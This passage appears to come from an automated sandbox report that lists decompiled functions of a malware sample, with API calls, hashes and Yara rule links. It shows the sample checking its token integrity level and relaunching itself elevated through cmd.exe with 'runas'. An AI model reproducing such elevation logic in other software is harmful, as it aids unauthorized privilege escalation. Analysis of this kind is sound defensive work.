                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 291276006-0
                                                                                                                              • Opcode ID: 5afaa67cc787368316fce9753d421163e067746a7de207a3588c37efa8b50472
                                                                                                                              • Instruction ID: fcdeb0224203391e49e190e22222c500c66e82f8e0feb105e69c45be4461b970
                                                                                                                              • Opcode Fuzzy Hash: 5afaa67cc787368316fce9753d421163e067746a7de207a3588c37efa8b50472
                                                                                                                              • Instruction Fuzzy Hash: 0B41D671505245AEDB216F21DC40BFA3BA8EF00365F14842BF865CA1D2D738D9E1DBAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00970F80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00970FB7
                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00970FBF
                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00971048
                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00971073
                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 009710C8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                              • Opcode ID: bfc9933fa8613138e328f84ed7e3e739d4f8ed9f5c6d695ff1e74c50f9434c65
                                                                                                                              • Instruction ID: 8789d38915176778487bb5362e9575d67c5c4c41216ce2b11add54f696f16090
                                                                                                                              • Opcode Fuzzy Hash: bfc9933fa8613138e328f84ed7e3e739d4f8ed9f5c6d695ff1e74c50f9434c65
                                                                                                                              • Instruction Fuzzy Hash: BE41AF36A00249DBCF10DF68D884B9EBBB5BF85314F14C055E91CAB392D732AA55CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00952C00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00952C26
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00952C30
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004), ref: 00952C9C
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00952CF3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                              • String ID: yB0$yB0
                                                                                                                              • API String ID: 215268677-463233387
                                                                                                                              • Opcode ID: b2a9e83bc043e58157022bd558f4e12cb2d65865e4e1b15be544201c26b7e1f6
                                                                                                                              • Instruction ID: eb686983fd0d4fc0fb9c73f3fb7ed5d7cd8b1db44f9b8331defef5e9022fbebd
                                                                                                                              • Opcode Fuzzy Hash: b2a9e83bc043e58157022bd558f4e12cb2d65865e4e1b15be544201c26b7e1f6
                                                                                                                              • Instruction Fuzzy Hash: 6F314F306182419BC710DF15D484A1FF7E9AB8A359F11486AF998D73A1C334DC4DAB63
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009745E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                              • API String ID: 0-537541572
                                                                                                                              • Opcode ID: 7807f4b14c03288cf6f9b66d7daf73383f6d0c6e2d85f387844b5f8b41da537b
                                                                                                                              • Instruction ID: 6a36ec9e81becd97fb0a494cc342e1388596cd99a521c1a24854787f2a42eabd
                                                                                                                              • Opcode Fuzzy Hash: 7807f4b14c03288cf6f9b66d7daf73383f6d0c6e2d85f387844b5f8b41da537b
                                                                                                                              • Instruction Fuzzy Hash: 0721E473A05220EBCB219B64DC45B1A375CAF93BA4F258525EC1EAB293D7B0DC0097E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00976352 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00976436: _free.LIBCMT ref: 0097645B
                                                                                                                              • _free.LIBCMT ref: 009763A0
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              • _free.LIBCMT ref: 009763AB
                                                                                                                              • _free.LIBCMT ref: 009763B6
                                                                                                                              • _free.LIBCMT ref: 0097640A
                                                                                                                              • _free.LIBCMT ref: 00976415
                                                                                                                              • _free.LIBCMT ref: 00976420
                                                                                                                              • _free.LIBCMT ref: 0097642B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: ec142672700920a69af5a99161ae4926e1acd6a7d3f3acd9e3df4a233f901c26
                                                                                                                              • Instruction ID: 0cf0e22cf41df3a118b6a9d8cf5839cadc3252f88d3444ed9b5c14ed5be9ba72
                                                                                                                              • Opcode Fuzzy Hash: ec142672700920a69af5a99161ae4926e1acd6a7d3f3acd9e3df4a233f901c26
                                                                                                                              • Instruction Fuzzy Hash: 9A117F33A40F05BAD530BBB1CD07FCB7B9D9F84710F81C828B29E76062DB69B9048691
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00952D50 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00952D7B
                                                                                                                              • wsprintfW.USER32 ref: 00952D9B
                                                                                                                              • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,?,00000000,00000000), ref: 00952DE2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExecuteFileModuleNameShellwsprintf
                                                                                                                              • String ID: /c "%s"$cmd.exe$runas
                                                                                                                              • API String ID: 690967290-213241364
                                                                                                                              • Opcode ID: cc79a4ea83d915f757a09aacbede988f94f36adad7331cd877d44d1aed59dc69
                                                                                                                              • Instruction ID: 40ed1432b92d9a18d24d57221fd84556e85a1ba5ddb1e2f88f749001a20d513c
                                                                                                                              • Opcode Fuzzy Hash: cc79a4ea83d915f757a09aacbede988f94f36adad7331cd877d44d1aed59dc69
                                                                                                                              • Instruction Fuzzy Hash: 961173706082046BCA60EF18DC45B5F77E0FBC8705F10482DF58CD7290D635A8449B86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420030 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E00420030(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t11;
				void* _t13;
				void* _t14;
				struct HINSTANCE__* _t16;

				if(TlsGetValue( *0x43a8b4) == 0) {
					L4:
					_t16 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t16;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E0041FF4D(_t14, __eflags);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t16, "DecodePointer");
					L7:
					if(_t9 != 0) {
						_v0 =  *_t9(_a4);
					}
					goto L9;
				}
				_t11 =  *0x43a8b0; // 0x6
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x43a8b4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1fc);
				goto L7;
			}










                                                                                                                              0x00420041
                                                                                                                              0x00420064
                                                                                                                              0x0042006f
                                                                                                                              0x00420071
                                                                                                                              0x00420073
                                                                                                                              0x00420098
                                                                                                                              0x0042009d
                                                                                                                              0x0042009d
                                                                                                                              0x00420075
                                                                                                                              0x0042007a
                                                                                                                              0x0042007c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420084
                                                                                                                              0x0042008a
                                                                                                                              0x0042008c
                                                                                                                              0x00420094
                                                                                                                              0x00420094
                                                                                                                              0x00000000
                                                                                                                              0x0042008c
                                                                                                                              0x00420043
                                                                                                                              0x0042004b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042004d
                                                                                                                              0x00420056
                                                                                                                              0x0042005a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042005c
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • TlsGetValue.KERNEL32(?,0042051E,0041CAAE,0041AD79,?,0041AD79,004011F3,?,004011F3,?), ref: 0042003D
                                                                                                                              • TlsGetValue.KERNEL32(00000006,?,0041AD79,004011F3,?,004011F3,?), ref: 00420054
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041AD79,004011F3,?,004011F3,?), ref: 00420069
                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00420084
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$AddressHandleModuleProc
                                                                                                                              • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                              • API String ID: 1929421221-629428536
                                                                                                                              • Opcode ID: 80a5c9bc18465832d8e88f894513267e132476c302fd02231029b9223b2b5371
                                                                                                                              • Instruction ID: 97ff073bf3d9674ecc806fde45217012ddf6e62bdcc5159f6880ab362204ba72
                                                                                                                              • Opcode Fuzzy Hash: 80a5c9bc18465832d8e88f894513267e132476c302fd02231029b9223b2b5371
                                                                                                                              • Instruction Fuzzy Hash: 66F09630244622DBA621AB35FD00B5B3AE4AF41751B555132F915D23B1CB38CC16CB5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00978604 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0097864C
                                                                                                                              • __fassign.LIBCMT ref: 00978831
                                                                                                                              • __fassign.LIBCMT ref: 0097884E
                                                                                                                              • WriteFile.KERNEL32(?,0097604C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00978896
                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009788D6
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0097897E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1735259414-0
                                                                                                                              • Opcode ID: 62e99ada43c04a437bc9f1b9e87cb499e25a93f4487cc22821b21a3bc3fcaf09
                                                                                                                              • Instruction ID: 0ce6ea6b3d9bac58807fa2051aa8ae69171bfd8541a554b69d743b4e17b1f793
                                                                                                                              • Opcode Fuzzy Hash: 62e99ada43c04a437bc9f1b9e87cb499e25a93f4487cc22821b21a3bc3fcaf09
                                                                                                                              • Instruction Fuzzy Hash: BAC1AF76D002599FCF15CFA8C8849EEBBB9EF48314F28816AE859B7341D6319946CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040FE50 Relevance: 9.2, APIs: 6, Instructions: 180threadtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 42%
                                                                                                                              			E0040FE50(intOrPtr _a4) {
				long _v4;
				void* __ebx;
				void* __ecx;
				intOrPtr* _t38;
				intOrPtr* _t39;
				intOrPtr* _t44;
				struct HWND__* _t45;
				intOrPtr* _t48;
				struct HWND__* _t49;
				intOrPtr* _t52;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr* _t70;
				intOrPtr* _t71;
				intOrPtr* _t73;
				int _t74;
				struct HWND__* _t75;
				int _t78;
				void* _t80;
				struct HWND__* _t91;
				struct HWND__* _t92;
				struct HWND__* _t93;
				struct HWND__* _t94;
				struct HWND__* _t95;
				intOrPtr* _t96;
				void* _t98;
				struct HWND__* _t101;
				struct HWND__* _t102;
				struct HWND__* _t103;
				intOrPtr* _t104;
				struct HWND__* _t106;
				void* _t107;

				_t98 = _t80;
				GetExitCodeThread( *(_t98 + 0x10),  &_v4);
				if(_v4 != 0x103) {
					KillTimer( *(_t98 + 4), 1);
					CloseHandle( *(_t98 + 0x10));
					_t91 =  *(_t98 + 4);
					_t78 = 0;
					 *(_t98 + 0x10) = 0;
					 *((char*)(_t98 + 0x28)) = 0;
					 *((char*)(_t98 + 0x885)) = 0;
					 *((intOrPtr*)(_t98 + 0x888)) = 0;
					_t38 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t38;
					if(_t38 == 0) {
						_t39 = 0;
						__eflags = 0;
					} else {
						_t39 =  *_t38(_t91, 0x7534);
						_t107 = _t107 + 8;
					}
					 *0x43babc(_t39, 0x172, _t78,  *((intOrPtr*)(_t98 + 0x4c)));
					E0040F3C0(_t98, 1);
					E0040F1B0(_t78, _t98, __eflags);
					_t92 =  *(_t98 + 4);
					_t44 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t44 - _t78;
					if(_t44 == _t78) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *_t44(_t92, 0x6c);
						_t107 = _t107 + 8;
					}
					ShowWindow(_t45, _t78);
					_t93 =  *(_t98 + 4);
					_t48 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t48 - _t78;
					if(_t48 == _t78) {
						_t49 = 0;
						__eflags = 0;
					} else {
						_t49 =  *_t48(_t93, 0x74);
						_t107 = _t107 + 8;
					}
					ShowWindow(_t49, _t78);
					_t94 =  *(_t98 + 4);
					_t52 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t52 - _t78;
					if(_t52 == _t78) {
						_t95 = 0;
						__eflags = 0;
					} else {
						_t75 =  *_t52(_t94, 0x73);
						_t107 = _t107 + 8;
						_t95 = _t75;
					}
					ShowWindow(_t95, 5);
					_t96 =  *0x43baa4; // 0x418f9c
					 *_t96(_t95, 1);
					_t101 =  *(_t98 + 4);
					_t56 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t56 - _t78;
					if(_t56 == _t78) {
						_t57 = 0;
						__eflags = 0;
					} else {
						_t57 =  *_t56(_t101, 2);
						_t107 = _t107 + 8;
					}
					 *_t96(_t57, 1);
					_t102 =  *(_t98 + 4);
					_t60 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t60 - _t78;
					if(_t60 != _t78) {
						_t74 =  *_t60(_t102, 0x4e27);
						_t107 = _t107 + 8;
						_t78 = _t74;
					}
					_t103 =  *(_t98 + 4);
					_t62 =  *((intOrPtr*)(E00404510() + 0x70));
					__eflags = _t62;
					if(_t62 == 0) {
						_t104 = 0;
						__eflags = 0;
					} else {
						_t73 =  *_t62(_t103, 0x4e28);
						_t107 = _t107 + 8;
						_t104 = _t73;
					}
					 *_t96(_t78, 1);
					 *_t96(_t104, 1);
					_t66 =  *0x43babc(E00403C60( *((intOrPtr*)(_t98 + 8))), 0x1004, 0, 0);
					__eflags = _t66;
					if(_t66 > 0) {
						_t106 =  *(_t98 + 4);
						_t70 =  *((intOrPtr*)(E00404510() + 0x70));
						__eflags = _t70;
						if(_t70 == 0) {
							_t71 = 0;
							__eflags = 0;
						} else {
							_t71 =  *_t70(_t106, 0x402);
						}
						 *_t96(_t71, 1);
					}
					return  *_t96(E00403C60( *((intOrPtr*)(_t98 + 8))), 1);
				} else {
					 *((char*)(_t98 + 0x28)) = 1;
					 *((char*)(_t98 + 0x885)) = 1;
					return E0040F260(_t98, _a4);
				}
			}






































                                                                                                                              0x0040fe52
                                                                                                                              0x0040fe5d
                                                                                                                              0x0040fe6b
                                                                                                                              0x0040fe92
                                                                                                                              0x0040fe9c
                                                                                                                              0x0040fea2
                                                                                                                              0x0040fea5
                                                                                                                              0x0040fea7
                                                                                                                              0x0040feaa
                                                                                                                              0x0040fead
                                                                                                                              0x0040feb3
                                                                                                                              0x0040febe
                                                                                                                              0x0040fec1
                                                                                                                              0x0040fec3
                                                                                                                              0x0040fed2
                                                                                                                              0x0040fed2
                                                                                                                              0x0040fec5
                                                                                                                              0x0040fecb
                                                                                                                              0x0040fecd
                                                                                                                              0x0040fecd
                                                                                                                              0x0040fedf
                                                                                                                              0x0040fee9
                                                                                                                              0x0040fef0
                                                                                                                              0x0040fef5
                                                                                                                              0x0040fefd
                                                                                                                              0x0040ff00
                                                                                                                              0x0040ff02
                                                                                                                              0x0040ff0e
                                                                                                                              0x0040ff0e
                                                                                                                              0x0040ff04
                                                                                                                              0x0040ff07
                                                                                                                              0x0040ff09
                                                                                                                              0x0040ff09
                                                                                                                              0x0040ff18
                                                                                                                              0x0040ff1a
                                                                                                                              0x0040ff22
                                                                                                                              0x0040ff25
                                                                                                                              0x0040ff27
                                                                                                                              0x0040ff33
                                                                                                                              0x0040ff33
                                                                                                                              0x0040ff29
                                                                                                                              0x0040ff2c
                                                                                                                              0x0040ff2e
                                                                                                                              0x0040ff2e
                                                                                                                              0x0040ff37
                                                                                                                              0x0040ff39
                                                                                                                              0x0040ff41
                                                                                                                              0x0040ff44
                                                                                                                              0x0040ff46
                                                                                                                              0x0040ff54
                                                                                                                              0x0040ff54
                                                                                                                              0x0040ff48
                                                                                                                              0x0040ff4b
                                                                                                                              0x0040ff4d
                                                                                                                              0x0040ff50
                                                                                                                              0x0040ff50
                                                                                                                              0x0040ff59
                                                                                                                              0x0040ff5e
                                                                                                                              0x0040ff64
                                                                                                                              0x0040ff66
                                                                                                                              0x0040ff6e
                                                                                                                              0x0040ff71
                                                                                                                              0x0040ff73
                                                                                                                              0x0040ff7f
                                                                                                                              0x0040ff7f
                                                                                                                              0x0040ff75
                                                                                                                              0x0040ff78
                                                                                                                              0x0040ff7a
                                                                                                                              0x0040ff7a
                                                                                                                              0x0040ff84
                                                                                                                              0x0040ff86
                                                                                                                              0x0040ff8e
                                                                                                                              0x0040ff91
                                                                                                                              0x0040ff93
                                                                                                                              0x0040ff9b
                                                                                                                              0x0040ff9d
                                                                                                                              0x0040ffa0
                                                                                                                              0x0040ffa0
                                                                                                                              0x0040ffa2
                                                                                                                              0x0040ffaa
                                                                                                                              0x0040ffad
                                                                                                                              0x0040ffaf
                                                                                                                              0x0040ffc0
                                                                                                                              0x0040ffc0
                                                                                                                              0x0040ffb1
                                                                                                                              0x0040ffb7
                                                                                                                              0x0040ffb9
                                                                                                                              0x0040ffbc
                                                                                                                              0x0040ffbc
                                                                                                                              0x0040ffc5
                                                                                                                              0x0040ffca
                                                                                                                              0x0040ffde
                                                                                                                              0x0040ffe4
                                                                                                                              0x0040ffe6
                                                                                                                              0x0040ffe8
                                                                                                                              0x0040fff0
                                                                                                                              0x0040fff3
                                                                                                                              0x0040fff5
                                                                                                                              0x00410004
                                                                                                                              0x00410004
                                                                                                                              0x0040fff7
                                                                                                                              0x0040fffd
                                                                                                                              0x0040ffff
                                                                                                                              0x00410009
                                                                                                                              0x00410009
                                                                                                                              0x0041001d
                                                                                                                              0x0040fe6d
                                                                                                                              0x0040fe74
                                                                                                                              0x0040fe78
                                                                                                                              0x0040fe86
                                                                                                                              0x0040fe86

                                                                                                                              APIs
                                                                                                                              • GetExitCodeThread.KERNEL32(?,?), ref: 0040FE5D
                                                                                                                              • KillTimer.USER32(00000103,00000001), ref: 0040FE92
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040FE9C
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040FF18
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040FF37
                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 0040FF59
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow$CloseCodeExitHandleKillThreadTimer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4211156161-0
                                                                                                                              • Opcode ID: 2f50391cf633d2f60dd5ce25ad6f0e8585a48a91c0bd7967febc810f4ee6d089
                                                                                                                              • Instruction ID: 7a4365c47b4a4ba292e257866e53a4284c1ee44b96485a670d96147e637025b2
                                                                                                                              • Opcode Fuzzy Hash: 2f50391cf633d2f60dd5ce25ad6f0e8585a48a91c0bd7967febc810f4ee6d089
                                                                                                                              • Instruction Fuzzy Hash: AE51C571204301ABD220AB75DC82F6B72D9AF84B04F04483FF356E76D1DAB8EC858769
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413190 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 43%
                                                                                                                              			E00413190(intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t54;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr* _t66;
				intOrPtr* _t75;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t83;
				signed int _t85;

				_push(0xffffffff);
				_push(E00430CF8);
				_push( *[fs:0x0]);
				_push(_t62);
				_push(_t75);
				_t29 =  *0x43a6a8; // 0x2a5cd135
				_push(_t29 ^ _t85);
				 *[fs:0x0] =  &_v12;
				_t78 = _t62;
				_t60 = _a8;
				_v4 = 1;
				_v16 = 0xffffffff;
				if( *((intOrPtr*)(_t78 + 4)) == 0) {
					L18:
					if(_t60 != 0 && InterlockedDecrement(_t60 + 8) == 0) {
						_t41 =  *_t60;
						if(_t41 != 0) {
							__imp__#6(_t41);
						}
						_t42 =  *((intOrPtr*)(_t60 + 4));
						_t104 = _t42;
						if(_t42 != 0) {
							_push(_t42);
							L0041B408(_t60, _t75, _t78, _t104);
							_t85 = _t85 + 4;
						}
						_push(_t60);
						L0041A97D(_t60, _t75, _t78, _t104);
						_t85 = _t85 + 4;
					}
					L25:
					_t79 = _a12;
					if(_t79 != 0 && InterlockedDecrement(_t79 + 8) == 0) {
						_t35 =  *_t79;
						if(_t35 != 0) {
							__imp__#6(_t35);
						}
						_t36 =  *((intOrPtr*)(_t79 + 4));
						_t108 = _t36;
						if(_t36 != 0) {
							_push(_t36);
							L0041B408(_t60, _t75, _t79, _t108);
							_t85 = _t85 + 4;
						}
						_push(_t79);
						L0041A97D(_t60, _t75, _t79, _t108);
						_t85 = _t85 + 4;
					}
					 *[fs:0x0] = _v12;
					return _v16;
				}
				_t83 = _a4;
				_t45 =  *_t83;
				if(_t45 == 0) {
					goto L18;
				}
				_t46 =  *_t45;
				if(_t46 == 0) {
					goto L18;
				}
				_t75 = __imp__#7;
				_push(_t46);
				if( *_t75() <= 0) {
					goto L18;
				}
				if(_t60 == 0) {
					goto L25;
				}
				_t48 =  *_t60;
				if(_t48 == 0) {
					goto L18;
				}
				_push(_t48);
				if( *_t75() <= 0) {
					goto L18;
				}
				_t75 = 0;
				_v4 = 0;
				_t50 =  *_t83;
				_t66 =  *((intOrPtr*)(_t78 + 4));
				_v12 = 2;
				if(_t50 == 0) {
					_t51 = 0;
					__eflags = 0;
				} else {
					_t51 =  *_t50;
				}
				_push( &_v4);
				_push(_t51);
				_push(_t66);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x94))))() < _t75) {
					L14:
					_t54 = _v16;
					if(_t54 != _t75) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t54 + 8))))(_t54);
						_t54 = 0;
						_v20 = 0;
					}
					goto L16;
				} else {
					_t54 = _v16;
					if(_t54 == _t75) {
						L16:
						_v24 = 1;
						if(_t54 != _t75) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t54 + 8))))(_t54);
						}
						goto L18;
					} else {
						_push( &_v8);
						if(E00412B80( &_v4,  &_v12) == 0) {
							_v40 = _t75;
						}
						goto L14;
					}
				}
			}

































                                                                                                                              0x00413190
                                                                                                                              0x00413192
                                                                                                                              0x0041319d
                                                                                                                              0x0041319e
                                                                                                                              0x004131a2
                                                                                                                              0x004131a3
                                                                                                                              0x004131aa
                                                                                                                              0x004131af
                                                                                                                              0x004131b5
                                                                                                                              0x004131bc
                                                                                                                              0x004131c0
                                                                                                                              0x004131c8
                                                                                                                              0x004131d0
                                                                                                                              0x00413294
                                                                                                                              0x00413296
                                                                                                                              0x004132a6
                                                                                                                              0x004132aa
                                                                                                                              0x004132ad
                                                                                                                              0x004132ad
                                                                                                                              0x004132b3
                                                                                                                              0x004132b6
                                                                                                                              0x004132b8
                                                                                                                              0x004132ba
                                                                                                                              0x004132bb
                                                                                                                              0x004132c0
                                                                                                                              0x004132c0
                                                                                                                              0x004132c3
                                                                                                                              0x004132c4
